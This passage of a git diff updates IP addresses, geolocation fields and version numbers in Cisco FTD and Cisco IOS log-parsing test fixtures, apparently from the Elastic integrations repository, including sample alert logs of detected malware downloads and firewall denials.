file, ThreatName: Win.Ransomware.Eicar::95.sbx.tg, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:39:02Z, FilePolicy: malware-and-file-policy, FileStorageStatus: Not Stored (Disposition Was Pending), FileSandboxStatus: File Size Is Too Small, URI: http://www.eicar.org/download/eicar_com.zip", + "ingested": "2021-12-09T13:35:21.450201900Z", + "original": "2019-08-16T09:39:03Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46004, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, SHA_Disposition: Unavailable, SperoDisposition: Spero detection not performed on file, ThreatName: Win.Ransomware.Eicar::95.sbx.tg, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:39:02Z, FilePolicy: malware-and-file-policy, FileStorageStatus: Not Stored (Disposition Was Pending), FileSandboxStatus: File Size Is Too Small, URI: http://www.eicar.org/download/eicar_com.zip", "code": "430005", "kind": "alert", "start": "2019-08-16T09:39:02Z", @@ -866,7 +866,7 @@ "file_sandbox_status": "File Size Is Too Small", "uri": "http://www.eicar.org/download/eicar_com.zip", "file_sha256": "2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad", - "dst_ip": "213.211.198.62", + "dst_ip": "81.2.69.144", "file_size": "184", "src_port": "46004", "src_ip": "10.0.1.20", @@ -950,7 +950,7 @@ }, "event": { "severity": 1, - "ingested": "2021-09-07T12:22:08.902883800Z", + "ingested": "2021-12-09T13:35:21.450207500Z", "original": "2019-08-16T09:40:45Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 55378, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 9a04a82eb19ad382f9e9dbafa498c6b4291f93cfe98d9e8b2915af99c06ffcd7, SHA_Disposition: Unavailable, SperoDisposition: Spero detection not performed on file, ThreatName: Unknown, FileName: dd3dee576d0cb4abfed00f97f0c71c1d, FileType: PDF, FileSize: 278987, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:40:45Z, FilePolicy: malware-and-file-policy, FileStorageStatus: Not Stored (Disposition Was Pending), FileSandboxStatus: Sent for Analysis, FileStaticAnalysisStatus: Failed to Send, URI: http://10.0.100.30/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d", "code": "430005", "kind": "alert", @@ -1005,25 +1005,25 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "DE-HE", - "city_name": "Frankfurt am Main", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Hesse", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 8.6843, - "lat": 50.1188 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 16509, + "number": 20712, "organization": { - "name": "Amazon.com, Inc." + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "18.197.225.123", + "address": "81.2.69.144", "port": 80, - "ip": "18.197.225.123" + "ip": "81.2.69.144" }, "source": { "port": 47926, @@ -1032,9 +1032,9 @@ }, "url": { "path": "/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d", - "original": "http://18.197.225.123/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d", + "original": "http://81.2.69.144/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d", "scheme": "http", - "domain": "18.197.225.123" + "domain": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -1074,7 +1074,7 @@ ], "ip": [ "10.0.1.20", - "18.197.225.123" + "81.2.69.144" ] }, "host": { @@ -1082,8 +1082,8 @@ }, "event": { "severity": 1, - "ingested": "2021-09-07T12:22:08.902884700Z", - "original": "2019-08-16T09:42:07Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 18.197.225.123, SrcPort: 47926, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 9a04a82eb19ad382f9e9dbafa498c6b4291f93cfe98d9e8b2915af99c06ffcd7, SHA_Disposition: Malware, SperoDisposition: Spero detection not performed on file, ThreatName: Pdf.Exploit.Pdfka::100.sbx.tg, ThreatScore: 100, FileName: dd3dee576d0cb4abfed00f97f0c71c1d, FileType: PDF, FileSize: 278987, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:42:06Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: Failed to Send, URI: http://18.197.225.123/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d", + "ingested": "2021-12-09T13:35:21.450211600Z", + "original": "2019-08-16T09:42:07Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 47926, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 9a04a82eb19ad382f9e9dbafa498c6b4291f93cfe98d9e8b2915af99c06ffcd7, SHA_Disposition: Malware, SperoDisposition: Spero detection not performed on file, ThreatName: Pdf.Exploit.Pdfka::100.sbx.tg, ThreatScore: 100, FileName: dd3dee576d0cb4abfed00f97f0c71c1d, FileType: PDF, FileSize: 278987, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:42:06Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: Failed to Send, URI: http://81.2.69.144/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d", "code": "430005", "kind": "alert", "start": "2019-08-16T09:42:06Z", @@ -1111,9 +1111,9 @@ "first_packet_second": "2019-08-16T09:42:06Z", "file_sandbox_status": "Failed to Send", "threat_score": "100", - "uri": "http://18.197.225.123/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d", + "uri": "http://81.2.69.144/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d", "file_sha256": "9a04a82eb19ad382f9e9dbafa498c6b4291f93cfe98d9e8b2915af99c06ffcd7", - "dst_ip": "18.197.225.123", + "dst_ip": "81.2.69.144", "file_size": "278987", "src_port": "47926", "src_ip": "10.0.1.20", diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-malware-site.log b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-malware-site.log index 3caf6780a5c..65034c68c48 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-malware-site.log +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-malware-site.log @@ -1 +1 @@ -2020-03-01T01:02:36Z CISCO-SENSOR-3D Alerts %NGIPS-0-430003: DeviceUUID: 1c8ff662-08f3-11e4-85c0-bc960372972f, AccessControlRuleAction: Allow, AccessControlRuleReason: IP Monitor, SrcIP: 3.3.3.3, DstIP: 2.2.2.2, SrcPort: 65090, DstPort: 80, Protocol: tcp, IngressInterface: s1p1, EgressInterface: s1p2, IngressZone: Inside-DMZ-Interface-Inline, EgressZone: Inside-DMZ-Interface-Inline, ACPolicy: COOL-POLICY-3D, AccessControlRuleName: Inside DMZ-Rule-Inline, Prefilter Policy: Unknown, User: No Authentication Required, UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36, Client: Chrome, ClientVersion: 80.0.3987.87, ApplicationProtocol: HTTP, ConnectionDuration: 20, InitiatorPackets: 4, ResponderPackets: 4, InitiatorBytes: 729, ResponderBytes: 246, NAPPolicy: State-Backbone, SecIntMatchingIP: Destination, IPReputationSICategory: Malware, HTTPReferer: http://eyedropper-color-pick.info/mk?c=1581483445764, ReferencedHost: eyedropper-color-pick.info, URL: http://bad-malwaresite-grr.info/favicon.ico +2020-03-01T01:02:36Z CISCO-SENSOR-3D Alerts %NGIPS-0-430003: DeviceUUID: 1c8ff662-08f3-11e4-85c0-bc960372972f, AccessControlRuleAction: Allow, AccessControlRuleReason: IP Monitor, SrcIP: 81.2.69.144, DstIP: 81.2.69.144, SrcPort: 65090, DstPort: 80, Protocol: tcp, IngressInterface: s1p1, EgressInterface: s1p2, IngressZone: Inside-DMZ-Interface-Inline, EgressZone: Inside-DMZ-Interface-Inline, ACPolicy: COOL-POLICY-3D, AccessControlRuleName: Inside DMZ-Rule-Inline, Prefilter Policy: Unknown, User: No Authentication Required, UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36, Client: Chrome, ClientVersion: 80.0.3987.87, ApplicationProtocol: HTTP, ConnectionDuration: 20, InitiatorPackets: 4, ResponderPackets: 4, InitiatorBytes: 729, ResponderBytes: 246, NAPPolicy: State-Backbone, SecIntMatchingIP: Destination, IPReputationSICategory: Malware, HTTPReferer: http://eyedropper-color-pick.info/mk?c=1581483445764, ReferencedHost: eyedropper-color-pick.info, URL: http://bad-malwaresite-grr.info/favicon.ico diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-malware-site.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-malware-site.log-expected.json index b7ea042807e..ba055f04e31 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-malware-site.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-malware-site.log-expected.json @@ -10,43 +10,52 @@ "destination": { "geo": { "continent_name": "Europe", - "country_name": "France", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 2.3387, - "lat": 48.8582 - }, - "country_iso_code": "FR" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 3215, + "number": 20712, "organization": { - "name": "Orange" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "2.2.2.2", + "address": "81.2.69.144", "port": 80, "bytes": 246, - "ip": "2.2.2.2", + "ip": "81.2.69.144", "packets": 4 }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Seattle", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -122.3451, - "lat": 47.6348 + "lon": -1.3614, + "lat": 51.7095 + } + }, + "as": { + "number": 20712, + "organization": { + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "3.3.3.3", + "address": "81.2.69.144", "port": 65090, "bytes": 729, - "packets": 4, - "ip": "3.3.3.3" + "ip": "81.2.69.144", + "packets": 4 }, "url": { "path": "/favicon.ico", @@ -95,8 +104,7 @@ "CISCO-SENSOR-3D" ], "ip": [ - "3.3.3.3", - "2.2.2.2" + "81.2.69.144" ] }, "host": { @@ -110,8 +118,8 @@ "event": { "severity": 0, "duration": 20000000000, - "ingested": "2021-09-07T12:22:10.459282500Z", - "original": "2020-03-01T01:02:36Z CISCO-SENSOR-3D Alerts %NGIPS-0-430003: DeviceUUID: 1c8ff662-08f3-11e4-85c0-bc960372972f, AccessControlRuleAction: Allow, AccessControlRuleReason: IP Monitor, SrcIP: 3.3.3.3, DstIP: 2.2.2.2, SrcPort: 65090, DstPort: 80, Protocol: tcp, IngressInterface: s1p1, EgressInterface: s1p2, IngressZone: Inside-DMZ-Interface-Inline, EgressZone: Inside-DMZ-Interface-Inline, ACPolicy: COOL-POLICY-3D, AccessControlRuleName: Inside DMZ-Rule-Inline, Prefilter Policy: Unknown, User: No Authentication Required, UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36, Client: Chrome, ClientVersion: 80.0.3987.87, ApplicationProtocol: HTTP, ConnectionDuration: 20, InitiatorPackets: 4, ResponderPackets: 4, InitiatorBytes: 729, ResponderBytes: 246, NAPPolicy: State-Backbone, SecIntMatchingIP: Destination, IPReputationSICategory: Malware, HTTPReferer: http://eyedropper-color-pick.info/mk?c=1581483445764, ReferencedHost: eyedropper-color-pick.info, URL: http://bad-malwaresite-grr.info/favicon.ico", + "ingested": "2021-12-09T13:35:23.717443400Z", + "original": "2020-03-01T01:02:36Z CISCO-SENSOR-3D Alerts %NGIPS-0-430003: DeviceUUID: 1c8ff662-08f3-11e4-85c0-bc960372972f, AccessControlRuleAction: Allow, AccessControlRuleReason: IP Monitor, SrcIP: 81.2.69.144, DstIP: 81.2.69.144, SrcPort: 65090, DstPort: 80, Protocol: tcp, IngressInterface: s1p1, EgressInterface: s1p2, IngressZone: Inside-DMZ-Interface-Inline, EgressZone: Inside-DMZ-Interface-Inline, ACPolicy: COOL-POLICY-3D, AccessControlRuleName: Inside DMZ-Rule-Inline, Prefilter Policy: Unknown, User: No Authentication Required, UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36, Client: Chrome, ClientVersion: 80.0.3987.87, ApplicationProtocol: HTTP, ConnectionDuration: 20, InitiatorPackets: 4, ResponderPackets: 4, InitiatorBytes: 729, ResponderBytes: 246, NAPPolicy: State-Backbone, SecIntMatchingIP: Destination, IPReputationSICategory: Malware, HTTPReferer: http://eyedropper-color-pick.info/mk?c=1581483445764, ReferencedHost: eyedropper-color-pick.info, URL: http://bad-malwaresite-grr.info/favicon.ico", "code": "430003", "kind": "event", "start": "2020-03-01T01:02:16.000Z", @@ -140,9 +148,9 @@ "responder_packets": "4", "access_control_rule_action": "Allow", "nap_policy": "State-Backbone", - "dst_ip": "2.2.2.2", + "dst_ip": "81.2.69.144", "ac_policy": "COOL-POLICY-3D", - "src_ip": "3.3.3.3", + "src_ip": "81.2.69.144", "protocol": "tcp", "application_protocol": "HTTP", "initiator_bytes": "729", diff --git a/packages/cisco_ftd/manifest.yml b/packages/cisco_ftd/manifest.yml index 08c6b50c00c..5401420f54b 100644 --- a/packages/cisco_ftd/manifest.yml +++ b/packages/cisco_ftd/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: cisco_ftd title: Cisco FTD -version: 1.2.0 +version: 1.2.1 license: basic description: Collect logs from Cisco FTD with Elastic Agent. type: integration diff --git a/packages/cisco_ios/_dev/deploy/docker/sample_logs/cisco-ios.log b/packages/cisco_ios/_dev/deploy/docker/sample_logs/cisco-ios.log index 2b366c25af3..b8814e463d6 100644 --- a/packages/cisco_ios/_dev/deploy/docker/sample_logs/cisco-ios.log +++ b/packages/cisco_ios/_dev/deploy/docker/sample_logs/cisco-ios.log @@ -1,13 +1,13 @@ -Feb 8 04:00:48 198.51.100.2 585917: Feb 8 04:00:47.272: %SEC-6-IPACCESSLOGRP: list 177 denied igmp 198.51.100.197 -> 224.0.0.22, 1 packet -Feb 9 04:00:48 198.51.100.2 585918: Feb 9 04:00:47.272: %SEC-6-IPACCESSLOGSP: list INBOUND-ON-F11 denied igmp 198.51.100.2 -> 224.0.0.2 (20), 1 packet -Feb 10 04:00:48 198.51.100.2 585919: Feb 10 04:00:47.272: %SEC-6-IPACCESSLOGNP: list 171 denied 0 198.51.100.1 -> 255.255.255.255, 1 packet -May 3 19:11:33 198.51.100.2 585920: May 3 19:11:32.619: %IPV6-6-ACCESSLOGP: list ACL-IPv6-E0/0-IN/10 permitted tcp 2001:DB8::3(1027) -> 2001:DB8:1000::1(22), 9 packets -Jun 20 02:41:40 198.51.100.2 1663303: Jun 20 02:41:39.326: %SEC-6-IPACCESSLOGP: list 177 denied udp 198.51.100.195(55250) -> 198.51.100.255(15600), 1 packet -Jun 20 02:41:45 198.51.100.2 1663304: Jun 20 02:41:44.921: %SEC-6-IPACCESSLOGDP: list 151 denied icmp 198.51.100.1 -> 198.51.100.2 (3/4), 1 packet -Jun 20 02:42:28 198.51.100.2 1663312: Jun 20 02:42:27.342: %SEC-6-IPACCESSLOGP: list 177 denied udp 198.51.100.195(54309) -> 198.51.100.255(15600), 1 packet -Jun 20 02:42:28 198.51.100.2 1663313: Jun 20 02:42:28.374: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 18 packets -Jun 20 02:42:34 198.51.100.2 1663314: Jun 20 02:42:33.340: %SEC-6-IPACCESSLOGP: list 177 denied udp 198.51.100.195(43989) -> 198.51.100.255(15600), 1 packet -Jun 20 02:43:09 198.51.100.2 1663321: Jun 20 02:43:08.454: %SEC-6-IPACCESSLOGP: list 150 denied tcp 198.51.100.12(59832) -> 172.217.10.46(80), 1 packet -Jun 20 02:43:29 198.51.100.2 1663325: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 23 packets -Jun 20 02:43:29 198.51.100.2 1663326: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGDP: list 150 denied icmp 198.51.100.12 -> 198.51.100.1 (3/3), 32 packets -Jun 20 02:43:30 198.51.100.2 1663327: Jun 20 02:43:29.451: %SEC-6-IPACCESSLOGP: list 150 denied tcp 198.51.100.12(59834) -> 172.217.10.46(80), 1 packet +Feb 8 04:00:48 192.168.100.2 585917: Feb 8 04:00:47.272: %SEC-6-IPACCESSLOGRP: list 177 denied igmp 192.168.100.197 -> 224.0.0.22, 1 packet +Feb 9 04:00:48 192.168.100.2 585918: Feb 9 04:00:47.272: %SEC-6-IPACCESSLOGSP: list INBOUND-ON-F11 denied igmp 192.168.100.2 -> 224.0.0.2 (20), 1 packet +Feb 10 04:00:48 192.168.100.2 585919: Feb 10 04:00:47.272: %SEC-6-IPACCESSLOGNP: list 171 denied 0 192.168.100.1 -> 255.255.255.255, 1 packet +May 3 19:11:33 192.168.100.2 585920: May 3 19:11:32.619: %IPV6-6-ACCESSLOGP: list ACL-IPv6-E0/0-IN/10 permitted tcp 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6(1027) -> 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6(22), 9 packets +Jun 20 02:41:40 192.168.100.2 1663303: Jun 20 02:41:39.326: %SEC-6-IPACCESSLOGP: list 177 denied udp 192.168.100.195(55250) -> 192.168.100.255(15600), 1 packet +Jun 20 02:41:45 192.168.100.2 1663304: Jun 20 02:41:44.921: %SEC-6-IPACCESSLOGDP: list 151 denied icmp 192.168.100.1 -> 192.168.100.2 (3/4), 1 packet +Jun 20 02:42:28 192.168.100.2 1663312: Jun 20 02:42:27.342: %SEC-6-IPACCESSLOGP: list 177 denied udp 192.168.100.195(54309) -> 192.168.100.255(15600), 1 packet +Jun 20 02:42:28 192.168.100.2 1663313: Jun 20 02:42:28.374: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 18 packets +Jun 20 02:42:34 192.168.100.2 1663314: Jun 20 02:42:33.340: %SEC-6-IPACCESSLOGP: list 177 denied udp 192.168.100.195(43989) -> 192.168.100.255(15600), 1 packet +Jun 20 02:43:09 192.168.100.2 1663321: Jun 20 02:43:08.454: %SEC-6-IPACCESSLOGP: list 150 denied tcp 192.168.100.12(59832) -> 81.2.69.144(80), 1 packet +Jun 20 02:43:29 192.168.100.2 1663325: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 23 packets +Jun 20 02:43:29 192.168.100.2 1663326: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGDP: list 150 denied icmp 192.168.100.12 -> 192.168.100.1 (3/3), 32 packets +Jun 20 02:43:30 192.168.100.2 1663327: Jun 20 02:43:29.451: %SEC-6-IPACCESSLOGP: list 150 denied tcp 192.168.100.12(59834) -> 81.2.69.144(80), 1 packet diff --git a/packages/cisco_ios/changelog.yml b/packages/cisco_ios/changelog.yml index 50cdfad33be..11ff65eda30 100644 --- a/packages/cisco_ios/changelog.yml +++ b/packages/cisco_ios/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.2.1" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "1.2.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-cisco-ios.log b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-cisco-ios.log index d52c0d7b1b8..17ba60830b8 100644 --- a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-cisco-ios.log +++ b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-cisco-ios.log @@ -1,19 +1,19 @@ -Feb 8 04:00:48 198.51.100.2 585917: Feb 8 04:00:47.272: %SEC-6-IPACCESSLOGRP: list 177 denied igmp 198.51.100.197 -> 224.0.0.22, 1 packet -Feb 9 04:00:48 198.51.100.2 585918: Feb 9 04:00:47.272: %SEC-6-IPACCESSLOGSP: list INBOUND-ON-F11 denied igmp 198.51.100.2 -> 224.0.0.2 (20), 1 packet -Feb 10 04:00:48 198.51.100.2 585919: Feb 10 04:00:47.272: %SEC-6-IPACCESSLOGNP: list 171 denied 0 198.51.100.1 -> 255.255.255.255, 1 packet -May 3 19:11:33 198.51.100.2 585920: May 3 19:11:32.619: %IPV6-6-ACCESSLOGP: list ACL-IPv6-E0/0-IN/10 permitted tcp 2001:DB8::3(1027) -> 2001:DB8:1000::1(22), 9 packets -Jun 20 02:41:40 198.51.100.2 1663303: Jun 20 02:41:39.326: %SEC-6-IPACCESSLOGP: list 177 denied udp 198.51.100.195(55250) -> 198.51.100.255(15600), 1 packet -Jun 20 02:41:45 198.51.100.2 1663304: Jun 20 02:41:44.921: %SEC-6-IPACCESSLOGDP: list 151 denied icmp 198.51.100.1 -> 198.51.100.2 (3/4), 1 packet -Jun 20 02:42:28 198.51.100.2 1663312: Jun 20 02:42:27.342: %SEC-6-IPACCESSLOGP: list 177 denied udp 198.51.100.195(54309) -> 198.51.100.255(15600), 1 packet -Jun 20 02:42:28 198.51.100.2 1663313: Jun 20 02:42:28.374: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 18 packets -Jun 20 02:42:34 198.51.100.2 1663314: Jun 20 02:42:33.340: %SEC-6-IPACCESSLOGP: list 177 denied udp 198.51.100.195(43989) -> 198.51.100.255(15600), 1 packet -Jun 20 02:43:09 198.51.100.2 1663321: Jun 20 02:43:08.454: %SEC-6-IPACCESSLOGP: list 150 denied tcp 198.51.100.12(59832) -> 172.217.10.46(80), 1 packet -Jun 20 02:43:29 198.51.100.2 1663325: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 23 packets -Jun 20 02:43:29 198.51.100.2 1663326: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGDP: list 150 denied icmp 198.51.100.12 -> 198.51.100.1 (3/3), 32 packets -Jun 20 02:43:30 198.51.100.2 1663327: Jun 20 02:43:29.451: %SEC-6-IPACCESSLOGP: list 150 denied tcp 198.51.100.12(59834) -> 172.217.10.46(80), 1 packet -Mar 24 18:06:03 198.51.100.2 1991219: Mar 24 18:06:03.424 UTC: %SEC_LOGIN-5-LOGIN_SUCCESS: Login Success [user: john.smith] [Source: 10.2.55.3] [localport: 22] at 12:06:03 MST Wed Mar 24 2021 -Mar 24 18:06:00 198.51.100.2 1991220: Mar 24 18:06:00.364 UTC: %SYS-6-LOGOUT: User john.smith has exited tty session 5(10.5.36.9) -Mar 24 17:37:39 198.51.100.2 1991221: Mar 24 17:37:39 UTC: %PIM-SW1-6-INVALID_RP_JOIN: Received (*, 10.36.2.78) Join from 10.4.5.66 for invalid RP 10.3.66.3 -Mar 24 17:37:39 198.51.100.2 1991221: Mar 24 17:37:39 UTC: %PIM-SW1-6-INVALID_RP_JOIN: Received (10.50.22.5, 10.36.2.78) Join from 10.4.5.66 for invalid RP 10.3.66.3 -Mar 24 12:09:35 198.51.100.2 1991217: Mar 24 12:09:35.367: %OSPF-4-NOVALIDKEY: No valid authentication send key is available on interface eth0 -Mar 24 12:06:47 198.51.100.2 1991218: Mar 24 12:06:47.099: %CCH323-6-CALL_PRESERVED: cch323_h225_handle_conn_loss: H.323 call preserved due to socket closure or error, Call Id = 6527, fd = 19 \ No newline at end of file +Feb 8 04:00:48 192.168.100.2 585917: Feb 8 04:00:47.272: %SEC-6-IPACCESSLOGRP: list 177 denied igmp 192.168.100.197 -> 224.0.0.22, 1 packet +Feb 9 04:00:48 192.168.100.2 585918: Feb 9 04:00:47.272: %SEC-6-IPACCESSLOGSP: list INBOUND-ON-F11 denied igmp 192.168.100.2 -> 224.0.0.2 (20), 1 packet +Feb 10 04:00:48 192.168.100.2 585919: Feb 10 04:00:47.272: %SEC-6-IPACCESSLOGNP: list 171 denied 0 192.168.100.1 -> 255.255.255.255, 1 packet +May 3 19:11:33 192.168.100.2 585920: May 3 19:11:32.619: %IPV6-6-ACCESSLOGP: list ACL-IPv6-E0/0-IN/10 permitted tcp 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6(1027) -> 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6(22), 9 packets +Jun 20 02:41:40 192.168.100.2 1663303: Jun 20 02:41:39.326: %SEC-6-IPACCESSLOGP: list 177 denied udp 192.168.100.195(55250) -> 192.168.100.255(15600), 1 packet +Jun 20 02:41:45 192.168.100.2 1663304: Jun 20 02:41:44.921: %SEC-6-IPACCESSLOGDP: list 151 denied icmp 192.168.100.1 -> 192.168.100.2 (3/4), 1 packet +Jun 20 02:42:28 192.168.100.2 1663312: Jun 20 02:42:27.342: %SEC-6-IPACCESSLOGP: list 177 denied udp 192.168.100.195(54309) -> 192.168.100.255(15600), 1 packet +Jun 20 02:42:28 192.168.100.2 1663313: Jun 20 02:42:28.374: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 18 packets +Jun 20 02:42:34 192.168.100.2 1663314: Jun 20 02:42:33.340: %SEC-6-IPACCESSLOGP: list 177 denied udp 192.168.100.195(43989) -> 192.168.100.255(15600), 1 packet +Jun 20 02:43:09 192.168.100.2 1663321: Jun 20 02:43:08.454: %SEC-6-IPACCESSLOGP: list 150 denied tcp 192.168.100.12(59832) -> 81.2.69.144(80), 1 packet +Jun 20 02:43:29 192.168.100.2 1663325: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 23 packets +Jun 20 02:43:29 192.168.100.2 1663326: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGDP: list 150 denied icmp 192.168.100.12 -> 192.168.100.1 (3/3), 32 packets +Jun 20 02:43:30 192.168.100.2 1663327: Jun 20 02:43:29.451: %SEC-6-IPACCESSLOGP: list 150 denied tcp 192.168.100.12(59834) -> 81.2.69.144(80), 1 packet +Mar 24 18:06:03 192.168.100.2 1991219: Mar 24 18:06:03.424 UTC: %SEC_LOGIN-5-LOGIN_SUCCESS: Login Success [user: john.smith] [Source: 10.2.55.3] [localport: 22] at 12:06:03 MST Wed Mar 24 2021 +Mar 24 18:06:00 192.168.100.2 1991220: Mar 24 18:06:00.364 UTC: %SYS-6-LOGOUT: User john.smith has exited tty session 5(10.5.36.9) +Mar 24 17:37:39 192.168.100.2 1991221: Mar 24 17:37:39 UTC: %PIM-SW1-6-INVALID_RP_JOIN: Received (*, 10.36.2.78) Join from 10.4.5.66 for invalid RP 10.3.66.3 +Mar 24 17:37:39 192.168.100.2 1991221: Mar 24 17:37:39 UTC: %PIM-SW1-6-INVALID_RP_JOIN: Received (10.50.22.5, 10.36.2.78) Join from 10.4.5.66 for invalid RP 10.3.66.3 +Mar 24 12:09:35 192.168.100.2 1991217: Mar 24 12:09:35.367: %OSPF-4-NOVALIDKEY: No valid authentication send key is available on interface eth0 +Mar 24 12:06:47 192.168.100.2 1991218: Mar 24 12:06:47.099: %CCH323-6-CALL_PRESERVED: cch323_h225_handle_conn_loss: H.323 call preserved due to socket closure or error, Call Id = 6527, fd = 19 \ No newline at end of file diff --git a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-cisco-ios.log-expected.json b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-cisco-ios.log-expected.json index ac44d4da98f..83f9ae2f713 100644 --- a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-cisco-ios.log-expected.json +++ b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-cisco-ios.log-expected.json @@ -4,7 +4,7 @@ "log": { "level": "informational", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "destination": { @@ -13,15 +13,15 @@ }, "source": { "packets": 1, - "address": "198.51.100.197", - "ip": "198.51.100.197" + "address": "192.168.100.197", + "ip": "192.168.100.197" }, - "message": "list 177 denied igmp 198.51.100.197 -\u003e 224.0.0.22, 1 packet", + "message": "list 177 denied igmp 192.168.100.197 -\u003e 224.0.0.22, 1 packet", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:Rt5RGlrNED3cg8Wokm4+KGsDz+4=", + "community_id": "1:NCx7UOZoQUvxIB+uzqMmGnZTSzI=", "transport": "igmp", "type": "ipv4", "packets": 1 @@ -31,15 +31,15 @@ }, "related": { "ip": [ - "198.51.100.197", + "192.168.100.197", "224.0.0.22" ] }, "event": { "severity": 6, "sequence": 585917, - "ingested": "2021-09-07T07:59:38.898592100Z", - "original": "Feb 8 04:00:48 198.51.100.2 585917: Feb 8 04:00:47.272: %SEC-6-IPACCESSLOGRP: list 177 denied igmp 198.51.100.197 -\u003e 224.0.0.22, 1 